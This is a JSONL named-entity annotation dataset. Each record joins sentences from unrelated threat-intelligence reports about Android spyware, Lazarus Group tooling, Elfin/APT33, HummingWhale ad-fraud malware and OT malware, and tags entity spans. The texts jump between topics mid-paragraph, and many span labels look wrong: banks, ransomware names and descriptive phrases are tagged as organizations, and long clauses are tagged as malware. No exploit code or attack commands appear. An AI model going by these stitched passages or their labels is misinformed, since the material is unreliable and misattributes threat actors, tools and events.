STRATOFEAR is a modular backdoor that communicates with C2 servers using a protocol specified in its C2 configuration , which is decrypted from a local file .", "spans": [{"start": 79, "end": 94, "label": "Malware"}, {"start": 297, "end": 304, "label": "Organization"}, {"start": 343, "end": 351, "label": "System"}, {"start": 659, "end": 669, "label": "Malware"}, {"start": 670, "end": 776, "label": "Malware"}, {"start": 788, "end": 815, "label": "Malware"}]} {"text": "We have been able to tie the malware to a long-running Facebook profile that we observed promoting the first stage of this family , a malicious chat application called Dardesh via links to Google Play . We are confident this KillDisk malware was deployed by Lazarus , rather than by another , unrelated attacker . Despite what the gateway does, this attack would only succeed if the message got through the gateway and a particular archive utility is used by the end-user, such as certain versions of PowerArchiver , WinRar , and older 7Zip as described . The new exploit method bypasses URL rewrite mitigations for the endpoint provided by Microsoft in response to \u2022", "spans": [{"start": 55, "end": 63, "label": "Organization"}, {"start": 168, "end": 175, "label": "Malware"}, {"start": 189, "end": 200, "label": "System"}, {"start": 225, "end": 241, "label": "System"}, {"start": 258, "end": 265, "label": "Organization"}, {"start": 303, "end": 311, "label": "Organization"}, {"start": 501, "end": 514, "label": "System"}, {"start": 517, "end": 523, "label": "System"}, {"start": 536, "end": 540, "label": "System"}, {"start": 641, "end": 650, "label": "Organization"}]} {"text": "The Lookout Threat Intelligence team identified that this same Facebook profile has also posted Google Drive links to Android malware belonging to the FrozenCell family attributed to APT-C-27 . 
This recent attack against an online casino in Central America suggests that hacking tools from the Lazarus toolset are recompiled with every attack ( we didn't see these exact samples anywhere else ) . In this case, the Trustwave Secure email Gateway flagged the message as suspicious and it did not get . Based on our research , we discovered an unknown threat actor using MortalKombat ransomware since December 2022 to target individuals and smaller companies .", "spans": [{"start": 4, "end": 31, "label": "Organization"}, {"start": 63, "end": 71, "label": "Organization"}, {"start": 96, "end": 108, "label": "System"}, {"start": 118, "end": 125, "label": "System"}, {"start": 151, "end": 161, "label": "Malware"}, {"start": 183, "end": 191, "label": "Indicator"}, {"start": 294, "end": 301, "label": "Organization"}, {"start": 432, "end": 437, "label": "System"}, {"start": 569, "end": 581, "label": "Organization"}, {"start": 623, "end": 656, "label": "Organization"}]} {"text": "These factors , in combination with the fact that the command and control infrastructure used by Frozen Cell and Desert Scorpion resides in similar IP blocks , supports the theory that the same actor is responsible for operating , if not developing , both families . Utilizing KillDisk in the attack scenario most likely served one of two purposes : the attackers covering their tracks after an espionage operation , or it was used directly for extortion or cyber-sabotage . Nevertheless, this case does highlight the types of tricks the bad guys are using in an attempt to deliver malware through . 
It also reveals direct links to secure[.]66[.]to and zhu[.]vn , both of which also belong to Hack520 and contains his personal blog .", "spans": [{"start": 97, "end": 108, "label": "Malware"}, {"start": 113, "end": 128, "label": "Malware"}, {"start": 277, "end": 285, "label": "System"}, {"start": 354, "end": 363, "label": "Organization"}, {"start": 458, "end": 472, "label": "Organization"}, {"start": 632, "end": 648, "label": "Indicator"}, {"start": 653, "end": 661, "label": "Indicator"}, {"start": 693, "end": 700, "label": "Organization"}]} {"text": "What it does The surveillance functionality of Desert Scorpion resides in a second stage payload that can only be downloaded if the victim has downloaded , installed , and interacted with the first-stage chat application . Today we'd like to share some of our findings , and add something new to what 's currently common knowledge about Lazarus Group activities , and their connection to the much talked about February 2016 incident , when an unknown attacker attempted to steal up to $851M USD from Bangladesh Central Bank . SHIPPING_MX00034900_PL_INV_pdf.zip : 9474e1517c98d4165300a49612888d16643efbf6 . CrowdStrike incident responders found that renamed Plink and AnyDesk executable creation timestamps on affected backend Exchange servers were closely correlated with PowerShell execution events in the Remote PowerShell logs , indicating the threat actor leveraged the newly discovered exploit chain to drop other tooling for persistent access to the affected Exchange servers .", "spans": [{"start": 47, "end": 62, "label": "Malware"}, {"start": 451, "end": 459, "label": "Organization"}, {"start": 500, "end": 523, "label": "Organization"}, {"start": 526, "end": 560, "label": "Indicator"}, {"start": 563, "end": 603, "label": "Indicator"}, {"start": 606, "end": 617, "label": "Organization"}]} {"text": "The chat application acts as a dropper for this second-stage payload app . 
Since the Bangladesh incident there have been just a few articles explaining the connection between Lazarus Group and the Bangladesh bank heist . Elfin : Relentless Espionage Group Targets Multiple Organizations in Saudi Arabia and U.S . KillNet \u2019s targeting has consistently aligned with established and emerging Russian geopolitical priorities , which suggests that at least part of the influence component of this hacktivist activity is intended to directly promote Russia 's interests within perceived adversary nations vis - a - vis the invasion of Ukraine .", "spans": [{"start": 175, "end": 188, "label": "Organization"}, {"start": 208, "end": 212, "label": "Organization"}, {"start": 221, "end": 226, "label": "Organization"}, {"start": 313, "end": 320, "label": "Organization"}, {"start": 492, "end": 511, "label": "Organization"}, {"start": 629, "end": 636, "label": "Organization"}]} {"text": "At the time of writing Lookout has observed two updates to the Dardesh application , the first on February 26 and the second on March 28 . However , from this it 's only clear that Lazarus might have attacked Polish banks . The Elfin espionage group ( aka APT33 ) has remained highly active over the past three years , attacking at least 50 organizations in Saudi Arabia , the United States , and a range of other countries . 
None The discovery was part of recent CrowdStrike Services investigations into several Play ransomware intrusions where the common entry vector was confirmed to be Microsoft Exchange .", "spans": [{"start": 23, "end": 30, "label": "Organization"}, {"start": 63, "end": 70, "label": "Malware"}, {"start": 181, "end": 188, "label": "Organization"}, {"start": 216, "end": 221, "label": "Organization"}, {"start": 228, "end": 233, "label": "Organization"}, {"start": 256, "end": 261, "label": "Organization"}, {"start": 464, "end": 484, "label": "Organization"}, {"start": 513, "end": 539, "label": "Organization"}, {"start": 590, "end": 608, "label": "System"}]} {"text": "The malicious capabilities observed in the second stage include the following : Upload attacker-specified files to C2 servers Get list of installed applications Get device metadata Inspect itself to get a list of launchable activities Retrieves PDF , txt , doc , xls , xlsx , ppt , pptx files found on external storage Send SMS Retrieve text messages Track device location Handle limited attacker commands via out of band text messages Record surrounding audio Record calls Record video Retrieve account information such as email addresses Retrieve contacts Removes copies of itself if Symantec also confirmed seeing the Lazarus wiper tool in Poland at one of their customers . The group , which first became active in late 2015 or early 2016 , specializes in scanning for vulnerable websites and using this to identify potential targets , either for attacks or creation of command and control ( C&C ) infrastructure . We judge that these operations are very likely aimed at stealing information and gaining persistent remote access .", "spans": [{"start": 586, "end": 594, "label": "Organization"}, {"start": 621, "end": 628, "label": "Organization"}, {"start": 666, "end": 675, "label": "Organization"}]} {"text": "any additional APKs are downloaded to external storage . 
Considering that the afterhack publications by the media mentioned that the investigation stumbled upon three different attackers , it was not obvious whether Lazarus was the one responsible for the fraudulent SWIFT transactions , or if Lazarus had in fact developed its own malware to attack banks ' systems . It has compromised a wide range of targets , including governments along with organizations in the research , chemical , engineering , manufacturing , consulting , finance , telecoms , and several other sectors . NuisanceDestruction intrinsic There are some that are intrinsically motivated to simply attack an organization or person for no other reason than to create chaos and destruction .", "spans": [{"start": 108, "end": 113, "label": "Organization"}, {"start": 177, "end": 186, "label": "Organization"}, {"start": 216, "end": 223, "label": "Organization"}, {"start": 294, "end": 301, "label": "Organization"}, {"start": 350, "end": 355, "label": "Organization"}, {"start": 423, "end": 434, "label": "Organization"}]} {"text": "Call an attacker-specified number Uninstall apps Check if a device is rooted Hide its icon Retrieve list of files on external storage If running on a Huawei device it will attempt to add itself to the protected list of apps able to run with the screen off Encrypts some exfiltrated data Desert Scorpion 's second stage masquerades as a generic \" settings '' application . We would like to add some strong facts that link some attacks on banks to Lazarus , and share some of our own findings as well as shed some light on the recent TTPs used by the attacker , including some yet unpublished details from the attack in Europe in 2017 . Elfin continues to be focused heavily on Saudi Arabia , which accounted for 42 percent of attacks observed by Symantec since the beginning of 2016 . 
Tortoiseshell Facebook Attack Campaign", "spans": [{"start": 287, "end": 302, "label": "Malware"}, {"start": 437, "end": 442, "label": "Organization"}, {"start": 446, "end": 453, "label": "Organization"}, {"start": 549, "end": 557, "label": "Organization"}, {"start": 635, "end": 640, "label": "Organization"}, {"start": 745, "end": 753, "label": "Organization"}, {"start": 784, "end": 822, "label": "Organization"}]} {"text": "Curiously , several of these have included the world \" Fateh '' in their package name , which may be referring to the Fatah political party . Lazarus attacks are not a local problem and clearly the group 's operations span across the whole world . However , the U.S. has also been a country of significant interest to the group , with 18 organizations attacked over the past three years , including a number of Fortune 500 companies . Almost immediately after its channel \u2019s creation , the group began posting files from compromised Ukrainian organizations .", "spans": [{"start": 118, "end": 123, "label": "Organization"}, {"start": 198, "end": 203, "label": "Organization"}, {"start": 533, "end": 556, "label": "Organization"}]} {"text": "Such references would be in line with FrozenCell 's phishing tactics in which they used file names to lure people associated with the political party to open malicious documents . Lazarus was previously known to conduct cyberespionage and cybersabotage activities , such as attacks on Sony Pictures Entertainment with volumes of internal data leaked , and many system harddrives in the company wiped . Elfin targets in the U.S. have included organizations in the engineering , chemical , research , energy consultancy , finance , IT , and healthcare sectors . 
Developed in - house using C++ , the NoEscape ransomware uses a hybrid approach to encryption , combining ChaCha20 and RSA encryption algorithms for file encryption and key protection .", "spans": [{"start": 38, "end": 48, "label": "Malware"}, {"start": 180, "end": 187, "label": "Organization"}, {"start": 285, "end": 312, "label": "Organization"}, {"start": 402, "end": 407, "label": "Organization"}, {"start": 587, "end": 590, "label": "System"}, {"start": 597, "end": 616, "label": "Malware"}]} {"text": "Desert Scorpion 's second stage is capable of installing another non-malicious application ( included in the second stage ) which is highly specific to the Fatah political party and supports the targeting theory . We believe that Lazarus Group is very large and works mainly on infiltration and espionage operations , while a substantially smaller units within the group , which we have dubbed Bluenoroff , is responsible for financial profit . Some of these U.S. organizations may have been targeted by Elfin for the purpose of mounting supply chain attacks . In April 2023 , media reports suggested that the U.S. government determined that Zarya breached a Canadian oil pipeline .", "spans": [{"start": 0, "end": 15, "label": "Malware"}, {"start": 156, "end": 161, "label": "Organization"}, {"start": 230, "end": 243, "label": "Organization"}, {"start": 365, "end": 370, "label": "Organization"}, {"start": 394, "end": 404, "label": "Organization"}, {"start": 504, "end": 509, "label": "Organization"}]} {"text": "The Lookout Threat Intelligence team is increasingly seeing the same tradecraft , tactics , and procedures that APT-C-23 favors being used by other actors . Lazarus regrouped and rushed into new countries , selecting mostly poorer and less developed locations , hitting smaller banks because they are , apparently , easy prey . In one instance , a large U.S. company was attacked in the same month a Middle Eastern company it co-owns was also compromised . 
The techniques leveraged during the incident suggest a growing maturity of Russia \u2019s offensive OT arsenal , including an ability to recognize novel OT threat vectors , develop new capabilities , and leverage different types of OT infrastructure to execute attacks .", "spans": [{"start": 4, "end": 31, "label": "Organization"}, {"start": 112, "end": 120, "label": "Malware"}, {"start": 157, "end": 164, "label": "Organization"}, {"start": 278, "end": 283, "label": "Organization"}, {"start": 532, "end": 562, "label": "Organization"}]} {"text": "The approach of separating malicious functionality out into separate stages that are later downloaded during execution and not present in the initial app published to the Google Play Store , combined with social engineering delivered via social media platforms like Facebook , requires minimal investment in comparison to premium tooling like Pegasus or FinFisher . To date , the Lazarus group has been one of the most successful in launching large scale operations against the financial industry . In a recent wave of attacks during February 2019 , Elfin attempted to exploit a known vulnerability ( CVE-2018-20250 ) in WinRAR , the widely used file archiving and compression utility capable of creating self-extracting archive files . 
As we \u2019ve already previously discussed in our 2017 predictions , these groups will constantly evolve and employ unique and advanced attack techniques .", "spans": [{"start": 171, "end": 188, "label": "System"}, {"start": 266, "end": 274, "label": "Organization"}, {"start": 343, "end": 350, "label": "Malware"}, {"start": 354, "end": 363, "label": "Malware"}, {"start": 380, "end": 393, "label": "Organization"}, {"start": 478, "end": 496, "label": "Organization"}, {"start": 550, "end": 555, "label": "Organization"}, {"start": 601, "end": 615, "label": "Vulnerability"}, {"start": 621, "end": 627, "label": "System"}]} {"text": "As we 've seen with actors like Dark Caracal , this low cost , low sophistication approach that relies heavily upon social engineering has still been shown to be highly successful for those operating such campaigns . We believe that Lazarus will remain one of the biggest threats to the banking sector , finance , and trading companies , as well as casinos for the next few years . The exploit was used against one target in the chemical sector in Saudi Arabia . csvde.exe", "spans": [{"start": 32, "end": 44, "label": "Malware"}, {"start": 233, "end": 240, "label": "Organization"}, {"start": 287, "end": 301, "label": "Organization"}, {"start": 304, "end": 311, "label": "Organization"}, {"start": 318, "end": 335, "label": "Organization"}, {"start": 349, "end": 356, "label": "Organization"}, {"start": 463, "end": 472, "label": "System"}]} {"text": "Given previous operational security errors from this actor in the past which resulted in exfiltrated content being publicly accessible Lookout Threat Intelligence is continuing to map out infrastructure and closely monitor their continued evolution . We believe Lazarus started this watering hole attack at the end of 2016 after their other operation was interrupted in South East Asia . 
If successfully exploited on an unpatched computer , the vulnerability could permit an attacker to install any file on the computer , which effectively permits code execution on the targeted computer . This gave them the ability to launch an unprecedented number of attacks within a short time frame and across a massive scale .", "spans": [{"start": 135, "end": 162, "label": "Organization"}, {"start": 262, "end": 269, "label": "Organization"}]} {"text": "Virulent Android malware returns , gets > 2 million downloads on Google Play HummingWhale is back with new tricks , including a way to gin user ratings . We believe they started this watering hole campaign at the end of 2016 after their other operation was interrupted in South East Asia . Two users in the targeted organization received a file called \" JobDetails.rar \" , which attempted to exploit the WinRAR vulnerability . UNC4899 targeting overlaps with a separate RGB - aligned group , APT43 , who in July , 2023 displayed interest in the cryptocurrency vertical , specifically targeting a variety of C - Suite executives from multiple fintech and cryptocurrency companies in the United States , South Korea , Hong Kong , and Singapore .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 9, "end": 16, "label": "System"}, {"start": 65, "end": 76, "label": "System"}, {"start": 77, "end": 89, "label": "Malware"}, {"start": 354, "end": 368, "label": "Indicator"}, {"start": 404, "end": 410, "label": "System"}, {"start": 427, "end": 434, "label": "Organization"}, {"start": 492, "end": 497, "label": "Organization"}, {"start": 607, "end": 678, "label": "Organization"}]} {"text": "DAN GOODIN - 1/23/2017 , 4:39 PM A virulent family of malware that infected more than 10 million Android devices last year has made a comeback , this time hiding inside Google Play apps that have been downloaded by as many as 12 million unsuspecting users . 
A rudimentary but somewhat clever design , KiloAlfa provides keylogging capability for the Lazarus Group 's collection of malicious tools . This file was likely delivered via a spear-phishing email . We have previously observed targeting in countries including Germany , Denmark , Sweden , France , Poland , Slovakia , Ukraine , Israel , the United Arab Emirates ( UAE ) , and other NATO ally and partner countries such as Japan .", "spans": [{"start": 35, "end": 43, "label": "Malware"}, {"start": 97, "end": 104, "label": "System"}, {"start": 169, "end": 180, "label": "System"}, {"start": 301, "end": 309, "label": "System"}, {"start": 349, "end": 362, "label": "Organization"}]} {"text": "HummingWhale , as the professionally developed malware has been dubbed , is a variant of HummingBad , the name given to a family of malicious apps researchers documented in July invading non-Google app markets . The design of KiloAlfa is broken down into two basic components : the persistence functionality and the keylogging functionality . However , prior to this attempted attack , Symantec had rolled out proactive protection against any attempt to exploit this vulnerability ( Exp.CVE-2018-20250 ) . Such non - native files and other data may be removed over the course of an intrusion to maintain a small footprint or as a standard part of the post - intrusion cleanup process .", "spans": [{"start": 0, "end": 12, "label": "Malware"}, {"start": 89, "end": 99, "label": "Malware"}, {"start": 226, "end": 234, "label": "System"}, {"start": 282, "end": 307, "label": "Malware"}, {"start": 316, "end": 340, "label": "System"}, {"start": 386, "end": 394, "label": "Organization"}, {"start": 483, "end": 501, "label": "Vulnerability"}]} {"text": "HummingBad attempted to override security protections by exploiting unpatched vulnerabilities that gave the malware root privileges in older versions of Android . 
The persistence functionality of KiloAlfa allows the malware to self-install on a victim 's machine when activated ( described below ) . This protection successfully protected the targeted organization from being compromised . Prior to Citrix \u2019s publication and our development of a PoC , we believed the session takeovers were the result of zero - day exploitation of an unknown vulnerability .", "spans": [{"start": 0, "end": 10, "label": "Malware"}, {"start": 68, "end": 93, "label": "Vulnerability"}, {"start": 153, "end": 160, "label": "System"}, {"start": 167, "end": 192, "label": "Malware"}, {"start": 196, "end": 204, "label": "System"}, {"start": 505, "end": 528, "label": "Vulnerability"}]} {"text": "Before Google shut it down , it installed more than 50,000 fraudulent apps each day , displayed 20 million malicious advertisements , and generated more than $ 300,000 per month in revenue . Evidence suggest that the Lazarus Group uses compromised infrastructure as the public-facing touchpoint for the majority of their malware samples . Elfin came under the spotlight in December 2018 when it was linked with a new wave of Shamoon attacks . This string is the schema that will be filled with the victim info , decoding this string will give us the following .", "spans": [{"start": 7, "end": 13, "label": "Organization"}, {"start": 217, "end": 230, "label": "Organization"}, {"start": 236, "end": 262, "label": "System"}, {"start": 339, "end": 344, "label": "Organization"}, {"start": 425, "end": 432, "label": "Organization"}, {"start": 448, "end": 509, "label": "Malware"}]} {"text": "Of the 10 million people who downloaded HummingBad-contaminated apps , an estimated 286,000 of them were located in the US . PapaAlfa is believed to be one of the proxy malware components that the Lazarus Group uses to hide the true command and control server ( s ) for operations . 
One Shamoon victim in Saudi Arabia had recently also been attacked by Elfin and had been infected with the Stonedrill malware ( Trojan.Stonedrill ) used by Elfin . When CrowdStrike researchers later reproduced the attack , events were present in CozyDuke - also known as CozyBear , CozyCar and Office Monkeys ( among others ) , and whose activity appears to align with advanced persistent threat APT29 - is a threat actor which came to prominence in 2014 when it is believed to have staged a series of precise attacks on high profile targets including the US White House , Department of State and the Democratic National Committee .", "spans": [{"start": 40, "end": 63, "label": "Malware"}, {"start": 125, "end": 133, "label": "System"}, {"start": 197, "end": 210, "label": "Organization"}, {"start": 287, "end": 294, "label": "Organization"}, {"start": 353, "end": 358, "label": "Organization"}, {"start": 390, "end": 400, "label": "Malware"}, {"start": 411, "end": 428, "label": "Malware"}, {"start": 439, "end": 444, "label": "Organization"}, {"start": 452, "end": 475, "label": "Organization"}, {"start": 529, "end": 537, "label": "Malware"}, {"start": 554, "end": 562, "label": "Malware"}, {"start": 565, "end": 572, "label": "Malware"}, {"start": 577, "end": 591, "label": "Malware"}, {"start": 679, "end": 684, "label": "Organization"}, {"start": 692, "end": 704, "label": "Organization"}, {"start": 839, "end": 853, "label": "Organization"}, {"start": 856, "end": 875, "label": "Organization"}, {"start": 884, "end": 913, "label": "Organization"}]} {"text": "HummingWhale , by contrast , managed to sneak its way into about 20 Google Play apps that were downloaded from 2 million to 12 million times , according to researchers from Check Point , the security company that has been closely following the malware family for almost a year . 
Rather , PapaAlfa could be considered a smart proxy due in part to the fact that the Lazarus can easily switch the backend destination address and port without having to reestablish control over the infected machine hosting the PapaAlfa malware . Because the Elfin and the Shamoon attacks against this organization occurred so close together , there has been speculation that the two groups may be linked . If you can not apply the KB5019758 patch immediately , you should disable OWA until the patch can be applied .", "spans": [{"start": 0, "end": 12, "label": "Malware"}, {"start": 68, "end": 79, "label": "System"}, {"start": 173, "end": 184, "label": "Organization"}, {"start": 288, "end": 296, "label": "System"}, {"start": 364, "end": 371, "label": "Organization"}, {"start": 507, "end": 523, "label": "System"}, {"start": 538, "end": 543, "label": "Organization"}, {"start": 552, "end": 559, "label": "Organization"}]} {"text": "Rather than rooting devices , the latest variant includes new virtual machine techniques that allow the malware to perform ad fraud better than ever , company researchers said in a blog post published Monday . In terms of form factor , PapaAlfa comes in two flavors : service DLL and standalone executable . However , Symantec has found no further evidence to suggest Elfin was responsible for these Shamoon attacks to date . 
Mandiant identified novel operational technology ( OT ) / industrial control system ( ICS)-oriented malware , which we track as COSMICENERGY , uploaded to a public malware scanning utility in December 2021 by a submitter in Russia .", "spans": [{"start": 236, "end": 244, "label": "System"}, {"start": 268, "end": 279, "label": "System"}, {"start": 284, "end": 305, "label": "System"}, {"start": 318, "end": 326, "label": "Organization"}, {"start": 368, "end": 373, "label": "Organization"}, {"start": 400, "end": 407, "label": "Organization"}, {"start": 426, "end": 434, "label": "Organization"}, {"start": 446, "end": 533, "label": "Malware"}, {"start": 554, "end": 566, "label": "Malware"}, {"start": 583, "end": 614, "label": "System"}]} {"text": "\" Users must realize that they can no longer trust in installing only apps with a high reputation from official app stores as their sole defense , '' the researchers wrote in an e-mail to Ars . The IndiaBravo-PapaAlfa installer is responsible for installing the service DLL variant . We continue to monitor the activities of both groups closely . Cisco Secure Endpoint ( formerly AMP for Endpoints ) is ideally suited to prevent the execution of the malware detailed in this post .", "spans": [{"start": 188, "end": 191, "label": "Organization"}, {"start": 198, "end": 227, "label": "System"}, {"start": 247, "end": 281, "label": "Malware"}, {"start": 347, "end": 368, "label": "System"}, {"start": 380, "end": 397, "label": "System"}]} {"text": "\" This malware employs several tactics to keep its activity hidden , meaning users might be unaware of its existence on their device . While the tools profiled in this report are not inherently malicious , their capabilities are nonetheless integral to the Lazarus Group 's cyber operations , both espionage and destructive in nature , making them inherently dangerous to potential victims . 
Elfin has deployed a wide range of tools in its attacks including custom malware , commodity malware , and open-source hacking tools . A careful analysis of the domain registrations from this threat actor between 2014 and 2015 allowed us to identify one profile used to register several domains that were used as C&C servers for a particular malware family employed by the Winnti group .", "spans": [{"start": 257, "end": 270, "label": "Organization"}, {"start": 298, "end": 307, "label": "Organization"}, {"start": 392, "end": 397, "label": "Organization"}, {"start": 527, "end": 777, "label": "Malware"}]} {"text": "'' As was the case with HummingBad , the purpose of HummingWhale is to generate revenue by displaying fraudulent ads and automatically installing apps . These tools often lay the groundwork for further malicious activity , such as the targeting of antivirus capabilities and the disabling of firewalls , both of which are very fundamental defensive measures . Custom malware used by the group include : Two threat clusters used Mimikatz for dumping process memory .", "spans": [{"start": 24, "end": 34, "label": "Malware"}, {"start": 52, "end": 64, "label": "Malware"}, {"start": 235, "end": 270, "label": "Malware"}, {"start": 279, "end": 301, "label": "Malware"}, {"start": 428, "end": 436, "label": "System"}]} {"text": "When users try to close the ads , the new functionality causes already downloaded apps to run in a virtual machine . Furthermore , like many other identified Lazarus Group families , these tools showcase the group 's creative solutions , such as the PapaAlfa , which makes it difficult to immediately identify potentially malicious activity on a compromised network . Notestuk ( Backdoor.Notestuk ) ( aka TURNEDUP ) : Malware that can be used to open a backdoor and gather information from a compromised computer . 
Healthcare has seen increasing email attacks from threat actors for a number of reasons .", "spans": [{"start": 158, "end": 171, "label": "Organization"}, {"start": 208, "end": 213, "label": "Organization"}, {"start": 250, "end": 258, "label": "System"}, {"start": 368, "end": 376, "label": "Malware"}, {"start": 379, "end": 396, "label": "Malware"}, {"start": 405, "end": 413, "label": "Malware"}, {"start": 515, "end": 525, "label": "Organization"}, {"start": 565, "end": 578, "label": "Organization"}]} {"text": "That creates a fake ID that allows the perpetrators to generate referral revenues . The first class , colloquially known as \" wipers \" , are a class of malware has the primary intent of destroying data on a victim 's machine . Stonedrill ( Trojan.Stonedrill ) : Custom malware capable of opening a backdoor on an infected computer and downloading additional files . NoEscape is a new ransomware which been doing the rounds in underground forums since May 2023 .", "spans": [{"start": 126, "end": 132, "label": "System"}, {"start": 186, "end": 201, "label": "Malware"}, {"start": 227, "end": 237, "label": "Malware"}, {"start": 240, "end": 257, "label": "Malware"}, {"start": 366, "end": 374, "label": "Malware"}]} {"text": "Use of the virtual machine brings many technical benefits to the operators , chief among them allowing the malware to install apps without requiring users to approve a list of elevated permissions . DDoS malware floods a target 's network-connected service with an excessive number of request at once in order to overload the capacity of the server . The malware also features a destructive component , which can wipe the master boot record of an infected computer . 
Beyond Ukraine , the group continues to sustain espionage operations that are global in scope and illustrative of the Russian military 's far - reaching ambitions and interests in other regions .", "spans": [{"start": 199, "end": 211, "label": "System"}, {"start": 313, "end": 334, "label": "Malware"}, {"start": 515, "end": 535, "label": "Organization"}]} {"text": "Advertisement The VM also disguises the malicious activity , making it easier for the apps to infiltrate Google Play . For example , DeltaAlfa specifies a DDoS bot family identified as Alfa . AutoIt backdoor : A custom built backdoor written in the AutoIt scripting language . Or , they may go up against groups whose ideologies do not align with their own .", "spans": [{"start": 105, "end": 116, "label": "System"}, {"start": 133, "end": 142, "label": "Malware"}, {"start": 155, "end": 163, "label": "System"}, {"start": 192, "end": 207, "label": "Malware"}, {"start": 305, "end": 356, "label": "Organization"}]} {"text": "It has the added benefit of installing a nearly unlimited number of fraudulent apps without overloading the infected device . The naming scheme used by Novetta for the malware identified during Operation Blockbuster consists of at least two identifiers which each identifier coming from the International Civil Aviation Organization ( ICAO ) 's phonetic alphabet ,2 commonly referred to as the NATO phonetic alphabet . In addition to its custom malware , Elfin has also used a number of commodity malware tools , available for purchase on the cyber underground . 
In the sample analyzed , PIEHOP \u2019s entry point c018c54eff8fd0b9be50b5d419d80f21 ( r3_iec104_control.py ) calls PIEHOP \u2019s main function , supplying the argument .", "spans": [{"start": 130, "end": 136, "label": "Malware"}, {"start": 152, "end": 159, "label": "Organization"}, {"start": 291, "end": 332, "label": "Organization"}, {"start": 455, "end": 460, "label": "Organization"}, {"start": 588, "end": 722, "label": "Malware"}]} {"text": "Until now , Android malware that wanted advanced capabilities typically had to trick users into approving sometimes scary-sounding permissions or exploit rooting vulnerabilities . Loaders are typically responsible for loading a DLL component into memory given that a DLL cannot operate in a standalone mode such as an executable . These include : This article provides an overview of the Iranian cyber threat landscape , including the history of Iranian cyber strategy , the most recent news regarding its attack campaigns , and descriptions of major Iranian cyber threat groups .", "spans": [{"start": 12, "end": 19, "label": "System"}, {"start": 218, "end": 253, "label": "Malware"}, {"start": 388, "end": 395, "label": "Organization"}, {"start": 446, "end": 453, "label": "Organization"}, {"start": 506, "end": 522, "label": "Organization"}, {"start": 551, "end": 578, "label": "Organization"}]} {"text": "Ginning the ratings FURTHER READING 1 million Google accounts compromised by Android malware called Gooligan To implement the VM feature , the malicious APK installation dropper used by HummingWhale uses DroidPlugin , an extension originally developed by developers from China-based company Qihoo 360 , Check Point said . This report will explore the various installers , uninstallers and loaders Novetta has observed the Lazarus Group using . Remcos ( Backdoor.Remvio ) : A commodity remote administration tool ( RAT ) that can be used to steal information from an infected computer . 
If implemented correctly , PIEHOP can connect to a user supplied remote MSSQL server for uploading LIGHTWORK and issuing remote commands specifically targeting RTU , and then delete itself .", "spans": [{"start": 46, "end": 52, "label": "Organization"}, {"start": 77, "end": 84, "label": "System"}, {"start": 100, "end": 108, "label": "Malware"}, {"start": 186, "end": 198, "label": "Malware"}, {"start": 204, "end": 215, "label": "Malware"}, {"start": 291, "end": 300, "label": "Organization"}, {"start": 303, "end": 314, "label": "Organization"}, {"start": 359, "end": 369, "label": "System"}, {"start": 372, "end": 384, "label": "System"}, {"start": 397, "end": 404, "label": "Organization"}, {"start": 422, "end": 435, "label": "Organization"}, {"start": 444, "end": 450, "label": "Malware"}, {"start": 453, "end": 468, "label": "Malware"}, {"start": 613, "end": 619, "label": "System"}]} {"text": "HummingWhale has also been observed hiding the original malicious app once it 's installed and trying to improve its Google Play reputation by automatically generating posts disguised as positive user comments and ratings . This reverse engineering report looks at the RATs and staging malware found within the Lazarus Group 's collection . DarkComet ( Backdoor.Breut ) : Another commodity RAT used to open a backdoor on an infected computer and steal information . 
Lastly , the command supplies a file named \u201c s1.txt \u201d in the \" pack\\scil\\ \" folder of the attacker 's ISO .", "spans": [{"start": 0, "end": 12, "label": "Malware"}, {"start": 117, "end": 128, "label": "System"}, {"start": 269, "end": 273, "label": "System"}, {"start": 278, "end": 293, "label": "System"}, {"start": 311, "end": 324, "label": "Organization"}, {"start": 341, "end": 350, "label": "Malware"}, {"start": 353, "end": 367, "label": "Malware"}, {"start": 475, "end": 571, "label": "Malware"}]} {"text": "Gooligan , a family of Android malware that came to light in November after it compromised more than 1 million Google accounts , contained similar abilities to tamper with Google Play ratings . Regardless of their sophistication or refinement , the malware families within the Lazarus Group 's India and Lima classes perform at a reasonable level for their designed purpose : the introduction and persistence of malware from the Lazarus Group on a victim 's infrastructure . Quasar RAT ( Trojan.Quasar ) : Commodity RAT that can be used to steal passwords and execute commands on an infected computer . The way Hack520 signs his messages in one hacker forum provides a clue pointing to this connection .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 23, "end": 30, "label": "System"}, {"start": 111, "end": 117, "label": "Organization"}, {"start": 172, "end": 183, "label": "System"}, {"start": 277, "end": 290, "label": "Organization"}, {"start": 429, "end": 442, "label": "Organization"}, {"start": 475, "end": 485, "label": "Malware"}, {"start": 488, "end": 501, "label": "Malware"}, {"start": 611, "end": 618, "label": "Organization"}]} {"text": "People who want to know if their Android devices are infected can download the Check Point app here . 
While the capabilities for the installers , loaders , and uninstallers in this report are relatively straight forward and single-focused , analysis of these malware families provide further insight into the capabilities of the Lazarus Group . Pupy RAT ( Backdoor.Patpoopy ) : Commodity RAT that can open a backdoor on an infected computer . None : While OT - oriented malware families can be purpose built for a particular target environment , malware that takes advantage of insecure by design OT protocols , such as LIGHTWORK \u2019s abuse of the IEC-104 protocol , can be modified and employed multiple times to target multiple victims .", "spans": [{"start": 33, "end": 40, "label": "System"}, {"start": 79, "end": 90, "label": "Organization"}, {"start": 133, "end": 143, "label": "System"}, {"start": 146, "end": 153, "label": "System"}, {"start": 160, "end": 172, "label": "System"}, {"start": 329, "end": 342, "label": "Organization"}, {"start": 345, "end": 353, "label": "Malware"}, {"start": 356, "end": 373, "label": "Malware"}, {"start": 450, "end": 486, "label": "Organization"}, {"start": 620, "end": 632, "label": "Malware"}, {"start": 646, "end": 662, "label": "Vulnerability"}]} {"text": "A separate app from Check Point competitor Lookout also detects the threat as a variant of the Shedun malware family . The Lazarus Group employs a variety of RATs that operate in both client mode and server mode . NanoCore ( Trojan.Nancrat ) : Commodity RAT used to open a backdoor on an infected computer and steal information . 
